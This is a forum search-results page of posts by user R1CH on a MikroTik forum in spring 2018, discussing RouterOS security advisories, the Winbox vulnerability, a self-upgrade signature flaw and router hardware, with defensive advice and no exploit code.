by R1CH
Tue May 29, 2018 5:58 pm
Forum: General
Topic: anyone facing DNS ip change to another ip, which is not set by network admin?
Replies: 2
Views: 269

Re: anyone facing DNS ip change to another ip, which is not set by network admin?

You should make sure you're using latest RouterOS and have changed all your passwords. There are several exploits that could have caused this.
by R1CH
Tue May 29, 2018 4:17 pm
Forum: General
Topic: A new scan has started
Replies: 10
Views: 1261

Re: A new scan has started

It should not be THAT easy to get a ROS version ... without authentication
Hope you aren't running any wireless networks then, since Mikrotik products broadcast the board name, radio name and RouterOS version number in every beacon!
by R1CH
Tue May 29, 2018 3:11 pm
Forum: Announcements
Topic: Winbox 3.14 released!
Replies: 77
Views: 24527

Re: Winbox 3.14 released!

I've tested on 2 PCs, one of them is the PC which has the signing certificate and private key, the other one is a fresh Windows 10 laptop with no certificates installed. Both ran the example .exe file with no warning. You can test it yourself, simply edit hosts file or add static DNS to point upgrad...
by R1CH
Tue May 29, 2018 3:00 pm
Forum: Announcements
Topic: Winbox 3.14 released!
Replies: 77
Views: 24527

Re: Winbox 3.14 released!

*) make winbox self upgrade check .exe signature; I just tested this.. it checks for a signature, but not Mikrotik's signature! I sign it myself and winbox blindly runs it :-? https://imgur.com/7k8e09p Is that really certificate based ? Or simply some MD5 hash ? In the later case this should not be...
by R1CH
Mon May 28, 2018 9:09 pm
Forum: Announcements
Topic: Winbox 3.14 released!
Replies: 77
Views: 24527

Re: Winbox 3.14 released!

*) make winbox self upgrade check .exe signature; I just tested this.. it checks for a signature, but not Mikrotik's signature! I sign it myself and winbox blindly runs it :-? https://imgur.com/7k8e09p Is that really certificate based ? Or simply some MD5 hash ? In the later case this should not be...
by R1CH
Mon May 28, 2018 7:05 pm
Forum: Announcements
Topic: Winbox 3.14 released!
Replies: 77
Views: 24527

Re: Winbox 3.14 released!

*) make winbox self upgrade check .exe signature;
I just tested this.. it checks for a signature, but not Mikrotik's signature! I sign it myself and winbox blindly runs it :-?

https://imgur.com/7k8e09p
by R1CH
Mon May 28, 2018 6:50 pm
Forum: Announcements
Topic: Winbox 3.14 released!
Replies: 77
Views: 24527

Re: Winbox 3.14 released!

What's new in v3.14: *) added support for new style authentication and encryption for connections to RouterOS v6.43; *) make all connections in secure mode (all data is encrypted with AES128-CBC-SHA); *) make winbox self upgrade check .exe signature; Nice to see a focus on security! Does the "new s...
by R1CH
Sun May 27, 2018 4:10 pm
Forum: General
Topic: Problem with thread access in ffmpeg
Replies: 5
Views: 507

Re: Problem with thread access in ffmpeg

Very weird. RTMP uses TCP and 1.8mbps should be no problem for any Routerboard. Maybe check MTU etc?
by R1CH
Fri May 25, 2018 2:43 pm
Forum: General
Topic: Problem with thread access in ffmpeg
Replies: 5
Views: 507

Re: Problem with thread access in ffmpeg

What's the bandwidth of the source stream?
by R1CH
Fri May 25, 2018 2:40 pm
Forum: General
Topic: How to avoid exposing RB version over a wireless AP?
Replies: 3
Views: 407

Re: How to avoid exposing RB version over a wireless AP?

This information along with the radio name and model number is directly encoded into the 802.11 beacons - you can not remove it (yet).

viewtopic.php?t=133186
by R1CH
Thu May 24, 2018 7:44 pm
Forum: General
Topic: CCR1009-7G-1C-1S+ 10G SFP
Replies: 1
Views: 265

Re: CCR1009-7G-1C-1S+ 10G SFP

Bandwidth tests should be run THROUGH the device, not ON the device. Generating 10G of traffic needs lots of CPU, so it maxes out at a single core on CCR1009.
by R1CH
Thu May 24, 2018 7:41 pm
Forum: General
Topic: [Security] Attackers changed DNS servers
Replies: 8
Views: 4975

Re: [Security] Attackers changed DNS servers

Because you run old version of RouterOS. Update and change all passwords.
by R1CH
Thu May 24, 2018 4:40 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

How do you know for sure it was the www exploit that was used instead of for example the more recent winbox exploit?
by R1CH
Wed May 23, 2018 8:29 pm
Forum: RouterBOARD hardware
Topic: VPNFilter Malware
Replies: 8
Views: 5027

Re: VPNFilter Malware

"We are unsure of the particular exploit used in any given case"

This is yet another reason why we need shell access to our own routers so we can do our own investigating looking for signs of compromise. Not every exploit is public.
by R1CH
Fri May 18, 2018 9:46 pm
Forum: General
Topic: I cant quite wrap my head around this one...
Replies: 62
Views: 5519

Re: I cant quite wrap my head around this one...

Sounds like the BT router has some AQM built in that you will need to replicate with RouterOS queue rules. Given the age of RouterOS kernel though it won't be able to compete with modern AQM like fq_codel (https://www.bufferbloat.net/projects/codel/wiki/) which is easy to set-and-forget.
by R1CH
Fri May 18, 2018 9:43 pm
Forum: General
Topic: Firewall Logic / Operation [SOLVED]
Replies: 2
Views: 421

Re: Firewall Logic / Operation [SOLVED]

An established connection should be tracked for 24 hours at minimum, I don't know where you're seeing 60 seconds but that certainly doesn't sound right. You should be seeing SYN, SYN+ACK, ACK as the connection establishment procedure. I'm also not clear what you mean by renegotiating, all connection...
by R1CH
Fri May 18, 2018 6:55 pm
Forum: RouterBOARD hardware
Topic: RB850Gx2 vs RB450Gx4
Replies: 49
Views: 10157

Re: RB850Gx2 vs RB450Gx4

No heatsink on the IPQ4019 chip?! Is it really that power efficient?
by R1CH
Sat May 12, 2018 12:05 am
Forum: RouterBOARD hardware
Topic: hAP AC2 Wrong Setup Instructions
Replies: 9
Views: 3007

Re: hAP AC2 Wrong Setup Instructions

Both of mine were new, from the only place in NL that had them in stock at the time (Routershop, listed as official reseller on "Buy" page). They were not in CPE mode once I was able to get a connection, something just caused the first time power up to behave very weirdly. Maybe next time I will try...
by R1CH
Thu May 10, 2018 7:22 pm
Forum: RouterBOARD hardware
Topic: What can be improved in hEX (RB750Gr3)?
Replies: 22
Views: 3588

Re: What can be improved in hEX (RB750Gr3)?

A CCR1009 is cheap enough, plus Tile architecture is end of life so I don't see new products based on that. I'd like a new hEX to be based on quad core ARM (same as hAP AC2) and 8 GigE ports, maybe one SFP/SFP+ if we're lucky. Plus a separate POE version able to handle ~ 80W combined output. Nothing...
by R1CH
Thu May 10, 2018 5:56 pm
Forum: RouterBOARD hardware
Topic: 10GBASE-T for Mikrotik
Replies: 13
Views: 2106

Re: 10GBASE-T for Mikrotik

Because 99.9% of home users don't need > 1gbps, since their devices won't support it. 8 port 10GB for $150? Who are you kidding! A switch alone would be $500+.

I would appreciate more ports in Mikrotik products though, 4+1 is not enough these days.
by R1CH
Thu May 10, 2018 5:53 pm
Forum: General
Topic: Security advisory emails
Replies: 1
Views: 488

Re: Security advisory emails

I've still yet to receive an email about the winbox zero-day exploit that affected < 6.42.1, I would argue a zero day deserves an email more than an exploit that was patched over a year ago!
by R1CH
Wed May 09, 2018 12:58 am
Forum: General
Topic: 6.42.1, hap ac, time sync not working
Replies: 10
Views: 1169

Re: 6.42.1, hap ac, time sync not working

This sounds like it might be a poorly configured upstream ISP that filters NTP packets for "DDoS protection".
by R1CH
Tue May 08, 2018 9:48 pm
Forum: Wireless Networking
Topic: Use AES-CCM only (unicast & group ciphers)
Replies: 4
Views: 1049

Re: Use AES-CCM only (unicast & group ciphers)

No one should be considering TKIP in 2018 for either unicast or group ciphers. It's trivially broken and AES has been part of the spec since 2004. Any device not supporting AES today belongs in the trash.
by R1CH
Mon May 07, 2018 2:43 pm
Forum: RouterBOARD hardware
Topic: hAP AC2 Wrong Setup Instructions
Replies: 9
Views: 3007

Re: hAP AC2 Wrong Setup Instructions

I only did quick test of 5 GHz to confirm unit was working OK, 176.24 mbps to HAP AC at -60dBm. 2.4 GHz isn't too important to me so I didn't test it.
by R1CH
Mon May 07, 2018 1:39 pm
Forum: RouterBOARD hardware
Topic: hAP AC2 Wrong Setup Instructions
Replies: 9
Views: 3007

Re: hAP AC2 Wrong Setup Instructions

Yes, can configure over both wired and wireless. Very strange first time startup behavior though.
by R1CH
Mon May 07, 2018 12:50 pm
Forum: RouterBOARD hardware
Topic: hAP AC2 Wrong Setup Instructions
Replies: 9
Views: 3007

Re: hAP AC2 Wrong Setup Instructions

As soon as I plugged in an ethernet cable, the link went up and down several times and now the default wireless network is broadcasting (??!). Looking at the logs it seems the unit didn't even register as being powered on until I plugged in the ethernet, it was on for 5+ minutes but the log shows: 0...
by R1CH
Mon May 07, 2018 12:44 pm
Forum: RouterBOARD hardware
Topic: hAP AC2 Wrong Setup Instructions
Replies: 9
Views: 3007

hAP AC2 Wrong Setup Instructions

I have received my second hAP AC2 now, but both the previous unit and this new unit are not broadcasting any network by default. https://i.imgur.com/kk5GDjA.jpg Is this a mistake with the instructions or is something else going on? As far as I know my distributor is not making any modifications to t...
by R1CH
Thu May 03, 2018 4:56 pm
Forum: General
Topic: PSN NAT Type
Replies: 5
Views: 1170

Re: PSN NAT Type

The problem is more likely related to your ISP modem or TP-Link load balancer. You shouldn't need to do anything special to have PS4 work fine, default NAT type will allow any inbound packets to endpoint opened ports.
by R1CH
Wed May 02, 2018 4:32 pm
Forum: Wireless Networking
Topic: 802.11ac required ratarate
Replies: 11
Views: 1512

Re: 802.11ac required ratarate

You cannot configure 802.11ac rates in RouterOS (yet?)
by R1CH
Wed May 02, 2018 4:31 pm
Forum: General
Topic: "Optimal Mangle" from "RouterOS by Example" performance?
Replies: 16
Views: 2151

Re: "Optimal Mangle" from "RouterOS by Example" performance?

You can't avoid examining every packet, the benefit is you can shortcut the mark packet rules evaluation by ordering the rules by volume. Eg if you only care about http traffic, you mark port 80 as http, mark everything else as other, then when it comes to packet marking you have mark other first in...
by R1CH
Wed May 02, 2018 12:15 pm
Forum: General
Topic: ovpn connection established? Is this an attack? [SOLVED]
Replies: 4
Views: 1466

Re: ovpn connection established? Is this an attack? [SOLVED]

Be aware that the OpenVPN daemon in RouterOS is a custom Mikrotik version and given their history of other NIH-daemons, it may have remotely exploitable security holes. It is not the official open source OpenVPN daemon which has had rigorous security testing, so I would advise against exposing it to...
by R1CH
Mon Apr 30, 2018 6:32 pm
Forum: RouterBOARD hardware
Topic: wAP AC 3 (IEEE 802.1ax)
Replies: 19
Views: 2884

Re: wAP AC 3 (IEEE 802.1ax)

based on open source This is where you are incorrect Best to avoid anything open source and re-invent everything in house? Meanwhile every other manufacturer is happily using ath10k driver: https://wireless.wiki.kernel.org/en/users/drivers/ath10k And yes, open source driver even has working spectra...
by R1CH
Sat Apr 28, 2018 4:00 pm
Forum: RouterBOARD hardware
Topic: wAP AC 3 (IEEE 802.1ax)
Replies: 19
Views: 2884

Re: wAP AC 3 (IEEE 802.1ax)

the bigger problem is driver support since Mikrotik creates here own drivers. The actual drivers doesn't support anything of WAVE 2, are way behind competitors Performance, and this will not change, so I'm not Interested in new devices, with rudimentary driver support and without any features.... 1...
by R1CH
Thu Apr 26, 2018 12:42 pm
Forum: General
Topic: Auto Upgrade Mirror
Replies: 2
Views: 1368

Re: Auto Upgrade Mirror

That's a Cloudfront IP, maybe at some point you thought to auto upgrade by entering IP of Mikrotik update server? Either way that isn't going to work, just remove it.
by R1CH
Tue Apr 24, 2018 11:50 pm
Forum: General
Topic: Bottleneck on CCR (possible queue related)
Replies: 9
Views: 1053

Re: Bottleneck on CCR (possible queue related)

Are you sure this isn't caused by your LAG? Depending how you are distributing packets you may be saturating one of the ports with too much traffic. Any chance to test with a 10G uplink?
by R1CH
Tue Apr 24, 2018 11:31 pm
Forum: Announcements
Topic: Advisory: Vulnerability exploiting the Winbox port [SOLVED]
Replies: 204
Views: 158707

Re: Advisory: Vulnerability exploiting the Winbox port

I know ... but it input chain is not the same as forward one. You can block access to router but not traffic forwarded to/from users.
Dropping in input is fine, but I've seen several blacklists use raw table which would obviously affect forwarded traffic too.
by R1CH
Tue Apr 24, 2018 11:11 pm
Forum: Announcements
Topic: Advisory: Vulnerability exploiting the Winbox port [SOLVED]
Replies: 204
Views: 158707

Re: Advisory: Vulnerability exploiting the Winbox port

Why blocking access to router is bad idea? Should "popular" addresses try to access our router?
You should be dropping such packets anyway. If you add them to a blacklist which blocks all communications from that IP, then you block legitimate services if someone spoofs them.
by R1CH
Tue Apr 24, 2018 10:55 pm
Forum: Announcements
Topic: Advisory: Vulnerability exploiting the Winbox port [SOLVED]
Replies: 204
Views: 158707

Re: Advisory: Vulnerability exploiting the Winbox port

If you're blacklisting based on connection attempts to certain ports, I would advise against it. Doing this opens up a new attack vector where an attacker with IP spoofing capabilities (eg many cheap VPS providers) can spoof popular IPs and cause your network to block legitimate services. Taking any...
by R1CH
Mon Apr 23, 2018 6:28 pm
Forum: Announcements
Topic: Advisory: Vulnerability exploiting the Winbox port [SOLVED]
Replies: 204
Views: 158707

Re: Advisory: Vulnerability exploiting the Winbox port

When is the first known exploit of this so we can browse the logs. And have exploit rewritten the log file ? The exploit may not appear in the logs. It can download system passwords without logging in, so even if there appears no successful or failed logins, you should consider your passwords compr...
by R1CH
Mon Apr 23, 2018 6:20 pm
Forum: Announcements
Topic: v6.42.1 [current]
Replies: 272
Views: 44699

Re: v6.42.1 [current]

No issues across my mix of devices (RB750Gr3, wAP AC, hAP AC, RB951).
by R1CH
Mon Apr 23, 2018 5:58 pm
Forum: Announcements
Topic: Advisory: Vulnerability exploiting the Winbox port [SOLVED]
Replies: 204
Views: 158707

Re: Advisory: Vulnerability exploiting the Winbox port

!) winbox - fixed vulnerability that allowed to gain access to an unsecured router; Shifting of the blame onto users... what else are we supposed to use for remote management? Where do you see shifting blame on the users? It is information for users to know that routers are safe against this vulner...
by R1CH
Mon Apr 23, 2018 5:38 pm
Forum: Announcements
Topic: Advisory: Vulnerability exploiting the Winbox port [SOLVED]
Replies: 204
Views: 158707

Re: Advisory: Vulnerability exploiting the Winbox port

!) winbox - fixed vulnerability that allowed to gain access to an unsecured router;
Shifting of the blame onto users... what else are we supposed to use for remote management?
by R1CH
Mon Apr 23, 2018 5:07 pm
Forum: Announcements
Topic: Advisory: Vulnerability exploiting the Winbox port [SOLVED]
Replies: 204
Views: 158707

Re: Advisory: Vulnerability exploiting the Winbox port

Correct me if I'm wrong, but isn't something missing here? Now we know how they got passwords to log in, but what about those files (script and binary) uploaded to router and (probably) executed by RouterOS? Is it some other hidden functionality of WinBox we know nothing about? When the tool gets y...
by R1CH
Mon Apr 23, 2018 1:31 pm
Forum: Announcements
Topic: Advisory: Vulnerability exploiting the Winbox port [SOLVED]
Replies: 204
Views: 158707

Re: Advisory: Vulnerability exploiting the Winbox port

So is this it https://www.securityweek.com/remotely-e ... s-routeros ?

As its over month old post..
No, that's a different vulnerability in the SMB service.
by R1CH
Mon Apr 23, 2018 1:26 pm
Forum: Announcements
Topic: Advisory: Vulnerability exploiting the Winbox port [SOLVED]
Replies: 204
Views: 158707

Re: Advisory: Vulnerability exploiting the Winbox port

This is really scary. Can you explain how this happened in a more technical manner? Why is authentication not the first thing that is required before downloading files etc is possible? Why is the user database even made available over the winbox port prior to establishment of an authenticated connec...
by R1CH
Sun Apr 22, 2018 11:52 pm
Forum: Wireless Networking
Topic: "Management frame protection" - 802.11w compatibility
Replies: 10
Views: 3478

Re: "Management frame protection" - 802.11w compatibility

Anyone has any news about this issue? I'm surprised how neglected this feature was for this whole time, and now just became one of the top priority features that Mikrotik MUST go for. Specially these days, where any newbie can buy an extremely inexpensive WiFi Deauther anywhere... Any way to push M...
by R1CH
Sun Apr 22, 2018 11:02 pm
Forum: General
Topic: winbox vulnerable! Unusual login to routers [SOLVED]
Replies: 44
Views: 10085

Re: winbox vulnerable! Unusual login to routers [SOLVED]

Also, in general there should be no public facing remote router administration service. Best is to use a VPN. Next best is to allow login on Winbox or SSH only from specific IPs. The VPN still requires exposing to the internet. Given how Mikrotik writes their own VPN daemons, I don't see how a VPN ...
by R1CH
Tue Apr 17, 2018 4:20 pm
Forum: Announcements
Topic: v6.42 [current]
Replies: 147
Views: 27570

Re: v6.42 [current]

Upgraded a bunch of hEX r3, wAP AC and hAP AC (original) with no issues. Holding off on the CCR-1009 for a bit.
by R1CH
Tue Apr 17, 2018 4:18 pm
Forum: General
Topic: MikroTik 6.41.4 - FTP daemon Denial of Service PoC
Replies: 25
Views: 1733

Re: MikroTik 6.41.4 - FTP daemon Denial of Service PoC

Another home grown Mikrotik daemon with vulnerabilities... :roll: . Any normal Linux ftp daemon will not be vulnerable to such simple DoS attack. Trying to claim this is a normal DoS attack that would work against any service is wrong, see " 6 connections and less than 80KB crafted requests are enou...
by R1CH
Sun Apr 15, 2018 6:48 pm
Forum: General
Topic: ROS SMB version - HP scan destination not compatible
Replies: 5
Views: 632

Re: ROS SMB version - HP scan destination not compatible

This makes me wonder why Mikrotik don't use use Samba like every other home router manufacturer. They would get immediate compatibility with pretty much every SMB version. What benefit does home grown SMB daemon provide? Certainly not security...
by R1CH
Sun Apr 15, 2018 6:17 pm
Forum: Wireless Networking
Topic: Removing Mikrotik elements from beacons
Replies: 15
Views: 2288

Removing Mikrotik elements from beacons

Hello, Is there a way to prevent RouterOS from advertising itself in the 802.11 beacon frames? It's not so great to publicly broadcast the radio name, model name and RouterOS version to the world. This makes exploiting of Mikrotik networks much easier, since an adversary doesn't even need to break t...
by R1CH
Sun Apr 15, 2018 6:08 pm
Forum: General
Topic: Hotspot doesn't redirect to login page from https:// pages
Replies: 10
Views: 7789

Re: Hotspot doesn't redirect to login page from https:// pages

Nope, HTTPS is still secure and can't be attacked with a man in the middle without installing a root CA on the client.

A properly configured hotspot will open the portal page automatically on any modern device.